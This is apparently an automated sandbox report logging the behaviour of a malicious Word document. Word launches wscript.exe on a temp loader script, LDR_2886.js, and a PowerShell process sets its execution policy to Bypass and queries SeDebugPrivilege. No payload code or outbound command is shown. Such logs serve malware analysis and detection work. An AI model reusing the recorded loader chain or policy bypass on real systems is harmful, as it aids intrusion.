Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 3
Fn
Read - size = 4096, size_out = 4096 True 5
Fn
Data
Read - size = 4096, size_out = 2530 True 1
Fn
Data
Read - size = 542, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 0 True 1
Fn
Registry (87)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (10)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = aETAdzjz True 9
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (64)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 58
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Process #24: wscript.exe
179 0
»
Information Value
ID #24
File Name c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:22, Reason: Child Process
Unmonitor End Time: 00:01:33, Reason: Self Terminated
Monitor Duration 00:00:10
OS Process Information
»
Information Value
PID 0xb14
Parent PID 0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B28
0x 9FC
0x 40C
0x B0C
0x 9EC
0x A00
0x 500
0x 70C
0x 820
0x B00
Host Behavior
COM (5)
»
Operation Class Interface Additional Information Success Count Logfile
Create F414C260-6AC0-11CF-B6D1-00AA00BBBB58 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER False 1
Fn
Create 00000323-0000-0000-C000-000000000046 00000146-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 6C736DB1-BD94-11D0-8A23-00AA00B58E10 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 06290BD1-48AA-11D2-8432-006008C3FBFC E4D1C9B0-46E8-11D4-A2A6-00104BD35090 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create WScript.Shell IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
File (4)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js size = 19304, size_out = 19304 True 1
Fn
Data
Registry (30)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CLASSES_ROOT\.js - True 1
Fn
Open Key HKEY_CLASSES_ROOT\JSFile\ScriptEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 112, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 112, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 112, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 112, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\.js data = JSFile, type = REG_SZ True 1
Fn
Read Value HKEY_CLASSES_ROOT\JSFile\ScriptEngine data = JScript, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Module (26)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x77040000 True 1
Fn
Load ADVAPI32.dll base_address = 0x7fefd710000 True 1
Fn
Load ole32.dll base_address = 0x7fefea30000 True 1
Fn
Load C:\Windows\system32\advapi32.dll base_address = 0x7fefd710000 True 1
Fn
Get Handle c:\windows\system32\wscript.exe base_address = 0xff6b0000 True 3
Fn
Get Handle c:\windows\system32\ole32.dll base_address = 0x7fefea30000 True 1
Fn
Get Filename c:\windows\system32\wscript.exe process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7705c4a0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x7717f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefd72b5f0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegQueryValueExA, address_out = 0x7fefd72c480 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7fefd730710 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetObjectContext, address_out = 0x7fefea4c920 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoCreateInstance, address_out = 0x7fefea57490 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferIdentifyLevel, address_out = 0x7fefd72e470 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferCloseLevel, address_out = 0x7fefd72f660 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x7fefea4a4c4 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetClassObject, address_out = 0x7fefea62e18 True 1
Fn
Get Address c:\windows\system32\wscript.exe function = 1, address_out = 0xff6bd7f8 True 1
Fn
Create Mapping C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304 True 1
Fn
Map C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WSH-Timer, wndproc_parameter = 3168864 True 1
Fn
System (77)
»
Operation Additional Information Success Count Logfile
Sleep duration = -1 (infinite) True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:46:25 (UTC) True 1
Fn
Get Time type = Ticks, time = 153114 True 1
Fn
Get Time type = Performance Ctr, time = 20740044401 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:46:26 (UTC) True 3
Fn
Get Time type = Ticks, time = 154128 True 1
Fn
Get Time type = Performance Ctr, time = 20841242208 True 1
Fn
Get Time type = Ticks, time = 154144 True 2
Fn
Get Time type = Ticks, time = 154253 True 2
Fn
Get Time type = Performance Ctr, time = 20853604560 True 1
Fn
Get Time type = Performance Ctr, time = 20854550335 True 1
Fn
Get Time type = Ticks, time = 155579 True 1
Fn
Get Time type = Ticks, time = 156266 True 1
Fn
Get Time type = Ticks, time = 156297 True 1
Fn
Get Time type = Ticks, time = 157108 True 3
Fn
Get Time type = Ticks, time = 157124 True 1
Fn
Get Time type = Ticks, time = 157233 True 4
Fn
Get Time type = Ticks, time = 157249 True 3
Fn
Get Time type = Ticks, time = 157264 True 2
Fn
Get Time type = Ticks, time = 157358 True 1
Fn
Get Time type = Ticks, time = 157373 True 1
Fn
Get Time type = Ticks, time = 157389 True 1
Fn
Get Time type = Ticks, time = 157576 True 3
Fn
Get Time type = Ticks, time = 157592 True 1
Fn
Get Time type = Ticks, time = 157607 True 1
Fn
Get Time type = Ticks, time = 157732 True 2
Fn
Get Time type = Ticks, time = 157748 True 1
Fn
Get Time type = Ticks, time = 157951 True 3
Fn
Get Time type = Ticks, time = 158138 True 1
Fn
Get Time type = Ticks, time = 158294 True 1
Fn
Get Time type = Ticks, time = 158309 True 5
Fn
Get Time type = Ticks, time = 158325 True 2
Fn
Get Time type = Ticks, time = 158387 True 1
Fn
Get Time type = Ticks, time = 158403 True 1
Fn
Get Time type = Ticks, time = 158419 True 2
Fn
Get Time type = Ticks, time = 158434 True 1
Fn
Get Time type = Ticks, time = 158481 True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:46:30 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 21280522663 True 1
Fn
Get Time type = Ticks, time = 158497 True 3
Fn
Get Time type = Ticks, time = 158699 True 1
Fn
Get Info type = Operating System True 6
Fn
Get Info type = System Directory, result_out = Ι" True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 1
Fn
Process #25: wscript.exe
158 0
»
Information Value
ID #25
File Name c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:28, Reason: Child Process
Unmonitor End Time: 00:01:36, Reason: Self Terminated
Monitor Duration 00:00:08
OS Process Information
»
Information Value
PID 0x154
Parent PID 0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B9C
0x 210
0x 4D8
0x 248
0x 8CC
0x 4B4
0x B6C
0x C0
0x 4F4
0x 89C
Host Behavior
COM (4)
»
Operation Class Interface Additional Information Success Count Logfile
Create F414C260-6AC0-11CF-B6D1-00AA00BBBB58 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER False 1
Fn
Create 00000323-0000-0000-C000-000000000046 00000146-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 6C736DB1-BD94-11D0-8A23-00AA00B58E10 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 06290BD1-48AA-11D2-8432-006008C3FBFC E4D1C9B0-46E8-11D4-A2A6-00104BD35090 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File (4)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js size = 19304, size_out = 19304 True 1
Fn
Data
Registry (29)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CLASSES_ROOT\.js - True 1
Fn
Open Key HKEY_CLASSES_ROOT\JSFile\ScriptEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 80, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 80, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 80, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 80, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\.js data = JSFile, type = REG_SZ True 1
Fn
Read Value HKEY_CLASSES_ROOT\JSFile\ScriptEngine data = JScript, type = REG_SZ True 1
Fn
Read Value - value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Module (20)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x77040000 True 1
Fn
Load ADVAPI32.dll base_address = 0x7fefd710000 True 1
Fn
Load ole32.dll base_address = 0x7fefea30000 True 1
Fn
Load C:\Windows\system32\advapi32.dll base_address = 0x7fefd710000 True 1
Fn
Get Handle c:\windows\system32\wscript.exe base_address = 0xff6b0000 True 2
Fn
Get Handle c:\windows\system32\ole32.dll base_address = 0x7fefea30000 True 1
Fn
Get Filename c:\windows\system32\wscript.exe process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7705c4a0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x7717f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefd72b5f0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7fefd730710 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetObjectContext, address_out = 0x7fefea4c920 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoCreateInstance, address_out = 0x7fefea57490 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferIdentifyLevel, address_out = 0x7fefd72e470 True 1
Fn
